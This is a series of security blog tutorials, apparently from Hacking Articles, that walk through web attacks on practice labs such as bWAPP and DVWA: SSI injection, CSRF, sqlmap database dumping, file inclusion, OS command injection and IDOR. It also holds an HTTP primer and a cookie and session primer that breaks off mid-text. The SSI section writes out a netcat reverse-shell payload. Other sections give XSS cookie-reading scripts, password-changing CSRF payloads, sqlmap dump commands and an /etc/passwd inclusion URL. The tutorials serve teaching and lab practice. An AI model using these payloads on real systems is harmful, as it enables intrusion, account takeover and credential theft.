In this article you will learn how to exploit any server using server side include injection which is commonly known as SSI.

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. 

For more information visit owasp.org

 Let’s begin

In your kali Linux open the target IP in browser: 192.168.1.103/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select server side include injection now and click on hack

Now request web page will get open where you can see it is having two text fields for first name and last name respectfully.

Then I had given random name test: test as the first name and last name respectfully, to know what exactly I will receive when I will click on lookup tab. Here first name text filed is vulnerable to SSI injection.

when I clicked on lookup, a new wep page pop up on the window screen which was showning the IP 192.168.1.107 of my Kali Linux.

Now I will try to exploit this vulnerability by sending different types of malicious code into web application.  If you will see following screenshot carefully here I had sent a script which will generate an alert prompt in window screen. To perform this you need to modify text field of first name and type following code inside it.

<script>alert(“hack”)</script>

So when again we will click on lookup then an alert prompt “hack” will pop up in the window screen. Hence it confirms that first name text filed is vulnerable.

If I am willing to fetch cookies of the web server then this can be possible here also. Only we need to type following script code in the same text filed.

<script>alert(document.cookie)</script>

Now again an alert prompt will pop up with server’s cookie, which we can use for further exploitation.

Using exec directive we can execute a server side command with cmd as parameters. Here I am trying to retrieve all lists of files and folder using following code.

<!–#exec cmd=”ls -a” –>

Wonderful!!  So you can see without making proper compromise to the server we have got all present directories inside it.

Now at last finally we will try to access its remote shell using netcat which will help us for establishing a reverse connection with targeted system. Open a terminal to start netcat listener on port 4444 and type following inside vulnerable text filed as done above.

<!–#exec cmd=”nc 192.168.1.107 4444 -e /bin/bash” –>

So when again you will click on lookup tab you will get reverse connection through netcat shell  as I have received in following image which means the web application server is hacked where we can execute following command to penetrate more and more.

Id

pwd

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Server Side Injection Exploitation in bWapp appeared first on Hacking Articles.

Hello everyone, with the joy of having new kali version somewhere few of us are having hard time in setting Dhakkan (AUDI-1) sqli series lab in our kali machine.

So today we’ll be learning how to setup Dhakkan lab (one of the best labs I have seen for practicing and understanding SQL INJECTION) in our latest kali machine.

Download from here

Q – Why it is not as simple as it was in older version of kali?

Ans- In latest version of kali we are having PHP version 7.xxx which does not support MySQL functions because it support MySQLi functions.

MySQLi Extension (or simply known as MySQL improved or MySQLi) is a relational database driver that is used mainly in the PHP programming language. 

So we have 2 ways to set up

• Degrade your PHP version to 5.xx
• Change code of original Dhakkan lab to make it work with latest kali.

We’ll change code of labs.

Q- How I came to know that this is the issue?

Ans – When I set up my lab and browse it from my browser I saw I was unable to set up database required, See below screenshot

In the above screenshot see the URL .So now I know something is wrong in setup-db.php so I tried to run this specific file in my kali, see screenshot

So after googling the error I came to know I have to replace mysql_connect() with mysqli_connect()

After making this change when I run setup.php again I came across new error, see screenshot

So I replace mysql_query($sql) with mysqli_query($con, $sql)

($con is the connection link we made to our database) if you don’t know php don’t worry simply replace mysql_query($sql) with mysqli_query($con, $sql)

So this is how I debug the issue.

Now I am summarizing the changes that I made and you have to do to set up your lab.

Simply use Ctrl+F and replace all feature to make changes at a fast pace.

You have to make changes in index.php of ALL lessons, other php files in lessons and in all php files present in sql-connections Folder.

(Or you can contact me to get the edited lab)

After making the above changes copy complete sqli-labs folder in /var/www/html folder of kali

Now open kali terminal and move to this folder using command “cd /var/www/html”

Now give permissions to sqlilabs folder using command “chmod 777 sqlilabs”

Now move to sqlilabs folder using command “cd sqlilabs” And give permissions to all files and folder in it using command “chmod 777 *”

Now your lab is ready to use you can access you lab using your browser Ip of your kali machine/sqlilabs

Click on Setup/reset Database for labs

Database set now practice and enjoy and use you skill to help organizations in securing their apps and applications from hackers. Don’t test it on sites for which you don’t have written permission to do so. It is illegal you may end up going behind the bars and ruin your career.

We are very thankful to Audi-1(aka Dhakkan) for creating such an interesting and awesome environment for us to understand and practice SQL injection.

Author – Rinkish Khera is a Web Application security consultant who loves competitive coding, hacking and learning new things about technology. Contact Here

The post How to set up SQLI Lab in Kali appeared first on Hacking Articles.

Today we will see CSRF attack in different scenario like transferring fund and password changing but before we see how cross site request forgery works we need to understand of few concepts.

Tabbed browsing: Tabbed browsing is an attribute of the Web browsers which allow the users to view multiple web sites on a single window instead of opening new browser window. These extra web pages are represented by tabs at the top of the browser window.

Imagine that you are logged into the Facebook server and visit a malicious website in the same browser, although on different tab. In absence of the same origin policy (SOP), an attacker can go through your profile and other sensitive information with the help of JavaScript. For example read private messages, send fake message, read your chats.

SOP: The same-origin policy is an important concept in the web application security model. Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin.

XHR: XML Http Request is an API in the form of an object whose methods transfer data between a web browser and a web server. 

• Update a web page without reloading the page
• Request data from a server – after the page has loaded
• Receive data from a server  – after the page has loaded
• Send data to a server – in the background

CSRF: Cross-site request forgery also known as single-click attack or session traversing, in which a malicious website will throw a request to a web application that the user is already authenticated against from a different website. This way an attacker can access functionality in a targeted web application via the victim’s already authenticated browser.

If the victim is an ordinary user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the targeted end user is the administrator account, this can compromise the entire web application.

In this article we will test a web application against csrf vulnerability with the help of burp suit Poc.

Source https://www.w3schools.com/xml/xml_http.asp

https://en.wikipedia.org/wiki/Same-origin_policy

Let’s start!!

 For this tutorial I had used bWAPP the vulnerable web application and create a new user raaz with password 123 for login inside the web server.

Now set the security level low then from list of given vulnerability choose your bug cross site request forgery (change secret) and click on hack.

If you have noticed the first image for creating a new user in that the user “raaz” has set his secret value as 123 now if the user raaz wish to change the secret value for his password he can change it from here.

Now let’s check out how we can test this functionality against CSRF attack and force raaz to change his secret value from the attacker’s desired value that is set a new secret value without his (user) knowledge.

Start the burp suite to capture the sent request between the browser and web application.

Form given screenshot you can see we have successfully captured the request inside burp suite now here once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.

CSRF PoC generator will automatically generates an HTML form page which you can see in given below screenshot, Click on copy HTML tag and open a text document to past the copied data.

Once you have paste the html code now add your (attacker) secret value “1234” moreover you need to add user name “raaz” for whom the secret value will get changed, now save the text document as csrf1.html and then use social engineering technique for sharing csrf1.html file to the targeted user.

When victim will open Csrf1.html file, here he will found a submit button now as he will click on submit button the secret value for target location will get changed without his (victim) knowledge.

Here you observe the result form given below screenshot. Hence in this way CSRF attack change the old secret value for password set by user “raaz”.

In next scenario we are going to test CSRF attack while transfer amount from users account. You might be well aware from such scenario when phone operator let say Airtel transfer an amount (Rs 500) in order to recharge customer phone and user receive the message of transaction and other example is related  bank amount transfer from one user’s account to another user’s account.

In order to learn csrf attack in this situation again login in bWAPP then choose your next vulnerability cross site request forgery (transfer Amount) and click on hack.

In the given screenshot you can see user have only 1000 EUR in his account it means above this amount the transaction  is not possible for both (user as well as for attacker). Further it is showing user’s account number to transfer and amount to be transfer.

The procedure for csrf attack is similar as above use burp suite to capture the sent request of browser.

Form given screenshot you can see we have successfully captured the request inside burp suite now here once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.

Again it will create html form automatically for intercepted data now click on copy html tag given at below to copy the generate html code for form.

Open a text document to past the copied data, Once you have paste the html code now add your (attacker) amount “100” to be transfer, now save the text document as csrf2.html and then use social engineering technique for sharing csrf2.html file to the targeted user.

When victim will open Csrf2.html file, here he will found a submit button now as he will click on submit button given amount will be transfer without his (victim) knowledge.

From given screenshot result you see now the amount is left 900 EUR in user’s account which means 100 EUR has been deducted from his account. Hence again we saw effect of CSRF attack while amount transaction from once account to another.

At last we are going to learn the most impactful CRSF attack for changing the password of user account without his knowledge. Again we will login into bwapp and choose the bug “cross site request forgery (change password)” to test the csrf vulnerability.

Here you can clearly saw two text field, one for new password another for confirm password again we will repeat the process using burp suite to catch the request of browser.

Form given screenshot you can see we have successfully captured the request inside burp suite now here once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.

Once again it has generated the html code for changing the password, hence you can see burp suite itself generate related html form for destination website, and this is an advantage which save attacker’s time for generating CSRF html form. Again click on copy html tab to copy the code.

Open a text document to past the copied data, Once you have paste the html code now add your (attacker)new password value and confirm password value, now save the text document as csrf3.html and then use social engineering technique for sharing csrf3.html file to the targeted user.

If you remember the old password was “123” for user “raaz” and from screenshot you can perceive that now new password is raj.

When victim will open Csrf3.html file, here he will found a submit button now as he will click on submit button the password will reset for his account without his (victim) knowledge.

Hence you can verified it through given below image where it has clearly gave the message that “password has been changed”

So today you have seen how we had made csrf attack on web application server in different scenario with help of burp suite Poc.

Try it yourself!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Understanding the CSRF Vulnerability (A Beginner Guide) appeared first on Hacking Articles.

Hello friends! In our previous article we saw how an attacker can shoot web application against CSRF vulnerability with help of burp suite. Today again we are going to test CSRF attack with help of XSS vulnerability.AS we know taking the help of XSS attacker might be able to reads cookies from the same domain and if CSRF token are stored in cookies then attacker will able to read the CSRF token from CSRF protected post.

Let’s have a look how an attacker can make CSRF attack for changing password of admin account when the web application is suffering from cross site scripting vulnerability. For this tutorial I had used DVWA and set its security level low.

Suppose that you have found XSS vulnerability in any web application server. Here we are going to use java script or HTML script which will make CSRF attack for changing the password of admin account.

An XSS attack can be used to read the cookies and get the valid tokens if it is stored in cookies which have to be inserted in the malicious script to make CSRF possible. Using image tag we will send a malicious script, inside script I had set new password as 123456.

<img src=”/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change”>

Now let’s check whether the password for admin has been changed or not, previously credential was admin: password, if admin get failed to login inside web server using his previous credential then we had successfully made CSRF attack.

From given screenshot you can see using admin: password it confirms login failed. Now use your new password 123456 for login inside web server.

Similarly there is another web application bwapp where we will demonstrate same attack using XSS vulnerability. First you need to chose your bug “cross site scripting Reflected (post)” and set security level low.

In given screenshot the form is suffering from XSS vulnerability now we are going to generate a script for making CSRF possible in order to change password for a user. Here we are login as bee: bug into web server now we will try to change its password with help of cross site scripting.

Similarly using image tag we will send a malicious script, inside script I had set new password as hack.

<img src=”/bwapp/csrf_1.php?password_new=hack&password_conf=hack&action=change”>

From screenshot you can see generated image icon which means this form has XSS flaws now let check whether the password has been modified or not for user bee.

Now use previous credential bee: bug if login failed is confirmed it means we have successfully shoot the CSRF attack and from screenshot you can see “invalid credential or user not activated” message.  Now use new password for login into web server.

Conclusion: XSS vulnerabilities exist anywhere in same domain it could lead to CSRF attack and allows attackers to remotely control the target’s browser with full rights, making CSRF useless.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post CSRF Exploitation using XSS appeared first on Hacking Articles.

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
• Support for database process’ user privilege escalation via Metasploit’sMeterpreter getsystem command.

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables.

Sometimes you visit such websites that let you to select product item through their picture gallery if you observer its URL you will notice that product item is call through its product-ID numbers.

Let’s take an example

http://testphp.vulnweb.com/artists.php?artist=1

 So when attacker visits such kind of website he always checks for SQL vulnerability inside web server for lunching SQL attack.

Let’s check how attacker verifies SQL vulnerability.

Attacker will try to break the query in order to order to get error message, if he successfully received error message then it confirms that web server is SQL injection affected.

http://testphp.vulnweb.com/artists.php?artist=1’

 From screenshot you can see we have received error message successfully now we have make SQL attack on web server so that we can fetch database information.

Databases

 For database penetration testing we always choose SQLMAP, this tool is very helpful for beginners who are unable to retrieve database information manually or unaware from SQL injection techniques.

Open the terminal in your Kali Linux and type following command which start SQL injection attack on the targeted website.  

Sqlmap –u “http://testphp.vulnweb.com/artists.php?artist=1” –dbs –batch

 -u:  target URL

–dbs: fetch database name

–batch: This will leave sqlmap to go with default behavior whenever user’s input would be required

Here from given screenshot you can see we have successfully retrieve database name “acuart”

Tables

As we know a database is a set of record which consist of multiple table inside it therefore now use another command in order to fetch entire table names from inside the database system.

 Sqlmap –u “http://testphp.vulnweb.com/artists.php?artist=1” –D acuart –table –batch

 -D: DBMS database to enumerate (fetched database name)

–tables: enumerate DBMS database table

As a result given in screenshot we have enumerated entire table name of database system. There are 8 tables inside database “acuart” as following:

T1: artists

T2: carts

T3: categ

T4: featured

T5: guestbook

T6: pictures

T7: products

T8: users

Columns

Now further we will try to enumerate column name of desired table. Since we know there is a users table inside the database acuart and we want to know the all column names of users table therefore we will generate another command for column captions enumeration.

sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1” -D acuart -T users –columns –batch

-T: DBMS table to enumerate (fetched table name)

–columns: enumerate DBMS database columns

Get data from a table

Slowly and gradually we have penetrated much details of database but last and most important step is to retrieve information from inside the columns of a table. Hence at last we will generate a command which will dump information of users table.

 sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1” -D acuart -T users –dump –batch

–dump: dump all information of DBMS database

Here from given screenshot you can see it has dump entire information of table users, mainly users table contains login credential of other users. You can use these credential for login into server on behalf other users.

Dump All

Last command is the most powerful command in sqlmap which will save your time in database penetration testing; this command will perform all the above functions at once and dump entire database information including table names, column and etc.

sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1” -D acuart –dump-all –batch

This will give you all information at once which contains database name as well as table’s records.

Try it yourself!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Database Penetration Testing using Sqlmap (Part 1) appeared first on Hacking Articles.

You can insert the content of one PHP file into another PHP file before the server executes it, with the include () function. The function can be used to create functions, headers, footers or element that will be reused on multiple pages.

This will help developers to make it easy to change the layout of complete website with minimal effort.

If there is any change required then instead of changing thousands of files just change included file.

Assume we have a standard footer file called “footer.php“, that looks like this

<?php

echo “<p>Copyright &copy; 2010-” . date(“Y”) . ” hackingartices.in</p>”;

?>

 To include the footer file in a page, use the include statement

<html>

<body>

<h1>Welcome to Hacking Articles</h1>

<p>Some text.</p>

<p>Some more text.</p>

<?php include ‘footer.php’;?>

</body>

</html>

 Example 2

Assume we have a file called “vars.php“, with some variables defined:

<?php

$color=’red’;

$car=’BMW’;

?>

<html>

<body>

 <h1>Welcome to my home page!</h1>

<?php include ‘vars.php’;

echo “I have a $color $car.”;

?>

 </body>

</html>

 Output: I have red BMW

PHP Require Function

The require statement is also used to include a file into the PHP code.

However, there is one big difference between include and require; when a file is included with the include statement and PHP cannot find it, the script will continue to execute:

Example 3

 <html>
<body>
<h1>Welcome to my home page!</h1>
<?php include ‘noFileExists.php’;
echo “I have a $color $car.”;
?>
</body>
</html>

 Output: I have a

If we do the same example using the require statement, the echo statement will not be executed because the script execution dies after the require statement returned a fatal error:

 <html>
<body>

<h1>Welcome to my home page!</h1>
<?php require ‘noFileExists.php’;
echo “I have a $color $car.”;
?>
</body>
</html>

No output result

PHP Required_once Function

 Require_once() using this function we can access the data of another page once when you may need to include the called file more than once, It works the same way. The only difference between require and require_once is that If it is found that the file has already been included, calling script is going to ignore further inclusions.

Example 4

echo.php
<?php
echo “Hello”;
?>

test.php
<?php
require(‘echo.php’);
require_once(‘echo.php’);
?>

outputs: “Hello”

 Note

allow_url_include is disabled by default. If allow_url_fopen is disabled, allow_url_include is also disabled

You can enable allow_url_include from php.ini

 /etc/php7/apache2/php.ini

allow_url_include = On

File Inclusion Attacks

 It is an attack that allows an attacker to include a file on the web server through a php script. This vulnerability arises when a web application lets the client to submit input into files or upload files to the server.

This can lead following attacks:

• Code execution on the web server
• Cross Site Scripting Attacks (XSS)
• Denial of service (DOS)
• Data Manipulation Attacks

Two Types:

Local File Inclusion

Remote File Inclusion

Local File Inclusion (LFI)

 Local file inclusion vulnerability occur when a file to which to PHP account has accessed is passed as a parameter to the PHP function “include”, or “require_once”

This vulnerability occurs, for example, when a page receives, as inputs the path to the file that has to be included  and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.

Example – Local File Inclusion

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=file1.php

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=/etc/passwd

Read complete local file inclusion attack tutorial from here

Remote File Inclusion (RFI)

Remote File Inclusion occurs when the URI of a file located on a different server is passed to as a parameter to the PHP function “include”, “include_once” , “require” , or “require_once” . PHP incorporates the content into the pages. If the content happens to be PHP source code, PHP executes the file.

PHP Remote File inclusion allows and attacker to embed his/her own PHP code inside  a vulnerable  PHP script , which may lead to disastrous results such as allowing the attacker to execute remote commands on the web server, deface parts of the web or even steal confidential information.

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=file1.php

http:// 192.168.1.8/dvwa/vulnerabilities/fi/?page=http://google.com

Read complete remote file inclusion attack tutorial from here

Mitigation

• Strong Input Validation
• A whitelist of acceptable inputs
• Reject any inputs that does not strictly conform to specifications
• For filenames, use stringent whitelists that limits the character set to be used
• Exclude directory separators such as “/”
• Use a whitelist of allowable file extensions
• Environment hardening
• Develop and run your code in the most recent versions of PHP available
• Configure your PHP applications so that it does not use register_globals
• Set allow_url_fopen to false, which limits the ability to include files from remote locations
• Run your code using the lowest privileges
• Use a vetted library or framework that does not allow this weakness.

Source: https://www.w3schools.com/ 

               https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

               https://www.acunetix.com

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Beginner Guide to File Inclusion Attack (LFI/RFI) appeared first on Hacking Articles.

HTTP (Hyper Text Transfer Protocol) is basically a client-server protocol, wherein the client (web browser) makes a request to the server and in return the server responds to the request. The response by the server is mostly in the form of HTML formatted pages. HTTP protocol by default uses port 80, but the web server and the client can be configured to use a different port.

HTTP is a stateless protocol which means that server does not retain the information by each user. HTTP is the backbone of the World Wide Web (www) and for it being stateless simply means that it does not remember each and every client that connects to the internet and it does not matter if a single user sends multiple requests one after another, they all will still be treated as independent requests by the server.

We are currently using HTTP 2, its predecessors were HTTP 1.0 and 1.1, and the major differences between 1.X and 2, at a higher level, are:

• Http 2 is binary and not textual
• Http 2 is multiplexed, it can use a single connection for parallelism, Http one on the other hand is based on ordering and blocking.
• Http 2 uses compression in its headers to reduce the overhead.
• Http2 gives servers the capability to “push” responses to client servers proactively.

HTTP works through different methods and these methods are:

HTTP Request Methods

There is major difference between GET and POST method which people fail to understand. Once you understand these properly, you can manipulate and increase the security of your web application. The differences are as follows:

An HTTP client sends an HTTP request to a server in the form of a request message which includes following format

http://yahoo.com/

GET / HTTP/1.1

Host: yahoo.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Upgrade-Insecure-Requests: 1

There are several fields in the header, but we will discuss the more important ones:

Host: This field is in the header and it is used to identify individual website by a hostname if they are sharing the same IP address. The client web browser also sets a user-agent string to identify the type and version of the browser.

User-Agent: This field is set correctly to its default values by the web browser, but it can be spoofed by the end user. This is usually done by malicious user to retrieve contents designed for other types of web browsers.

Cookie: This field stores a temporary value shared between the client and server for session management.

Referer: This is another important field that you would often see when you are redirected from one URL to another. This field contains the address of the previous web page from which a link to the current page was followed. Attackers manipulate the Referer field using an XSS attack and redirect the user to a malicious website.

Accept-Encoding: This field defines the compression scheme supported by the client; gzip and Deflate are the most common ones. There are other parameters too, but they are of little use to penetration testers.

Response

Response: When a request is sent to the server; the server replies in the form of response. Following is an example of response:

HTTP/1.1 200 OK

Date: Sat, 10 Jun 2017 05:17:18 GMT

Set-Cookie: autorf=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/;

domain=in.yahoo.com

Content-Type: text/html; charset=UTF-8

Server: ATS

Expires: -1

Content-Length: 477864

HTTP Response Code: The Status-Code element is a 3-digit integer where first digit of the Status-Code defines the class of response and the last two digits do not have any categorization role. There are 5 values for the first digit

HTTP Version: A server supporting HTTP version 1.1 will return the following version information

 Date: The date and time that the message was originated

 Set-Cookie: This field, if defined, will contain a random value that can be used by the server to identify the client and store temporary data

Server: This field is of interest to a penetration tester and will help in the recon phase of a test. It displays useful information about the web server hosting the website.
Content-Length: This field will contain a value indicating the number of bytes in the body of the response. It is used so that the other party can know when the current request/response has finished.

Source:
https://www.tutorialspoint.com/http/index.htm

https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
https://www.httpwatch.com/httpgallery/

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Understanding the HTTP Protocol appeared first on Hacking Articles.

The dynamic Web applications may make the most of scripts to call up some functionality in the command line on the web server to process the input that received from the client and unsafe user input may led to OS command injection.  OS Command injection is refer as shell injection attack arise when an attacker try to perform system level commands through a vulnerable application in order to retrieve information of  web server or try to make unauthorized access into server .

Impact Analysis

Impact: Critical

Ease of Exploitability: Medium

Risk Rating: High

In this attack the attacker will inject his unwanted system level command so that he can fetch the information of web server; for example: ls , whoami , uname -a and etc.

Let’s consider a scenario where web application allows user to PING an IP other user so that it get confirms that the host connection 

Verify parameters to inject data

 The following parameters should be tested for command injection flaws, as the application may be using one of these parameters to build a command back at the web server:

• GET: In this method input parameters are sent in URLs.
• POST: In this method, input parameters are sent in HTTP body.
• HTTP header: Applications frequently use header fields to discover end users and display requested information to the user based on the value in the headers.

Some of the important header fields to check for command injection are:

• Cookies
• X-Forwarded-For
• User-agent
• Referrer

METACHARACTER

Using vulnerability scanner attacker come to know that current web application is vulnerable to command injection and try injecting system level unwanted command using Meta character.

Metacharacter are symbolic operators which are use to separate actual command from unwanted command. The ampercent (&) was used as a separator that would divide the authentic input and the command that you are trying to inject.

It will more clear in following image where attacker will inject his payload dir using metacharacter that retrieve present directory of web server.  

As result it will dump following output as shown in given image where it has validated wrong user input.

OS Command Injection Operators

 The developer possibly will set filters to obstruct the some metacharacter. This would block our injected data, and thus we need to try out with other metacharacters too, as shown in the following table:

Steps to exploit – OS Command Injection

Step 1: Identify the input field

Step 2: Understand the functionality

Step 3: Try the Ping method time delay

Step 4: Use various operators to exploit OS command Injection

Type of Command Injection

 Error based injection: When attacker injects a command through an input parameter and the output of that command is displayed on the certain web page, it proof that the application is vulnerable to the command injection. The displayed result might be in the form of an error or the actual outcomes of the command that you tried to run. An attacker then modifies and adds additional commands depending on the shell the web server and assembles information from the application.

Blind based Injection: The results of the commands that you inject will not displayed to the attacker and no error messages are returned it similar as blind SQL injection. The attacker will use another technique to identify whether the command was really executed on the server.

Mitigation-OS Command Injection

• Strong server side validation
• Implement a white list
• OS Hardening
• Use build in API’s for interacting with the OS if needed. More secure!!
• Avoid applications from calling out directly the OS system commands

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Beginner Guide to OS Command Injection appeared first on Hacking Articles.

Insecure Direct Object References (IDOR) has been placed fourth on the list of OWASP Top 10 Web application security risks since 2013. It allows an authorized user to obtain the information of other users, and could be establish in any type of web applications. Basically it allows requests to be made to specific objects through pages or services without the proper verification of requester’s right to the content.

OWASP definition: Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

The Application uses untested data in a SQL call that is accessing account information.

Let consider a scenario where a web application allow the login user to change his secret value.

Here you can see the secret value must be referring to some user account of the database.

Currently user bee is login into web server for changing his secret value but he is willing to perform some mischievous action that will change the secret value for other user.

Using burp suite we had captured the request of browser where you can see in the given image login user is bee and secret value is hello; now manipulate the user from another user.

SQLquery = “SELECT * FROM useraccounts WHERE account = ‘bee’;

Now let’s change user name into raj as shown in given image. To perform this attack in an application it requires atleast two user accounts.

SQLquery = “SELECT * FROM useraccounts WHERE account = ‘raj’;

Great!!!  We have successfully changed the secret value for raj.

Note: in any official website the attacker will replace user account from admin account.

Let take another scenario that look quite familiar for most of IDOR attack.

Many times we book different order online through their web application for example bookmyshow.com for movie ticket booking.

Let consider same scenario in bwapp for movie ticket booking, where I had book 10 tickets of 15 EUR for each.

Now let’s confirm it and capture the browser request through burp suite.

Now you can see we have intercepted request where highlighted text contains number of tickets and price of one ticket i.e 15 EUR it means it will reduce 150 EUR from my (user) account; now manipulate this price from your desire price.

I had changed it into 1 EUR which means now it will reduce only 10 EUR from account, you can observe it from given image then forward the request.

Awesome!!! We had booked the 10 tickets in 10 EUR only.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Beginner Guide to Insecure Direct Object References (IDOR) appeared first on Hacking Articles.

From Wikipedia and w3schools

Cookie

Cookie is a small piece of data sent by a server to a browser and stored on the user’s computer while the user is browsing. Cookies are produced and shared between the browser and the server using the HTTP Header.

It Allows server store and retrieve data from the client, It Stored in a file on the client side and maximum size of cookie that can stored is limited upto 4K in any web browser. Cookies have short time period because they have expiry date and time as soon as browser closed.

Example- when you visit YouTube and search for Bollywood songs, this gets noted in your browsing history, the next time you open YouTube on your browser, the cookies reads your browsing history and you will be shown Bollywood songs on your YouTube homepage

Creating cookie

The setcookie() function is used for the cookie to be sent along with the rest of the HTTP headers.

When developer creates a cookie, with the function setcookie, he must specify atleast three arguments. These arguments are setcookie(name, value, expiration);

Image Source Goolge

Cookie Attributes

1. Name: Specifies the name of the cookie
2. Value: Specifies the value of the cookie
3. Secure: Specifies whether or not the cookie should only be transmitted over a secure HTTPS connection. TRUE indicates that the cookie will only be set if a secure connection exists. Default is FALSE
4. Domain: Specifies the domain name of the cookie. To make the cookie available on all subdomains of example.com, set domain to “example.com”. Setting it to www.example.com will make the cookie only available in the www subdomain
5. Path: Specifies the server path of the cookie. If set to “/”, the cookie will be available within the entire domain. If set to “/php/”, the cookie will only be available within the php directory and all sub-directories of php. The default value is the current directory that the cookie is being set in
6. HTTPOnly: If set to TRUE the cookie will be accessible only through the HTTP protocol (the cookie will not be accessible by scripting languages). This setting can help to reduce identity theft through XSS attacks. Default is FALSE
7. Expires: Specifies when the cookie expires. The value: time ()+86400*30, will set the cookie to expire in 30 days. If this parameter is omitted or set to 0, the cookie will expire at the end of the session (when the browser closes). Default is 0

Necessity of Cookies

Cookies can be used for various purposes –

• Identifying Unique Visitors.
• Http is a stateless protocol; cookies permit us to track the state of the application using small files stored on the user’s computer.
• Recording the time each user spends on a website.

Type of cookies

Session Cookie

This type of cookies dies when the browser is closed because they are stored in browser’s memory. They’re used for e-commerce websites so user can continue browsing without losing what he put in his cart. If the user visits the website again after closing the browser these cookies will not be available. It is safer, because no developer other than the browser can access them.

Persistent Cookie

These cookies do not depend on the browser session because they are stored in a file of browser computer. If the user closes the browser and then access the website again then these cookies will still be available. The lifetime of these cookies are specified in cookies itself (as expiration time). They are less secure.

Third Party Cookie

A cookie set by a domain name that is not the domain name that appears in the browser address bar these cookies are mainly used for tracking user browsing patterns and/or finding the Advertisement recommendations for the user.

Secure Cookie

A secure cookie can only be transmitted over an encrypted connection.  A cookie is made secure by adding the secure flag to the cookie. Browsers which support the secure flag will only send cookies with the secure flag when the request is going to a HTTPS page.

HTTP Only Cookie

It informs the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly prohibited. This is an important security protection for session cookies.

Zombies Cookie

A zombie cookie is an HTTP cookie that is recreated after deletion. Cookies are recreated from backups stored outside the web browser’s dedicated cookie storage.

Sessions

PHP session: when any user made any changes in web application like sign in or out, the server does not know who that person on the system is. To shoot this problem PHP session introduce which store user information to be used across several web pages.

Session variables hold information about one single user, and are exist to all pages in one application.

Example: login ID user name and password.

Session ID

PHP code generates a unique identification in the form of hash for that specific session which is a random string of 32 hexadecimal numbers such as 5f7dok65iif989fwrmn88er47gk834 is known as PHPsessionID.

A session ID or token is a unique number which is used to identify a user that has logged into a website. Session ID is stored inside server, it is assigns to a specific user for the duration of that user’s visit (session). The session ID can be stored as a cookie, form field, or URL.

Explanation:

Now let’s have a look over this picture and see what this picture says:

In given picture we can clearly see there are three components inside it: HTTP Client, HTTP server and Database (holding session ID).

Step1: client send request to server via POST or GET.

Step2: session Id created on web server. Server save session ID into database and using set-cookie function send session ID to the client browser as response.

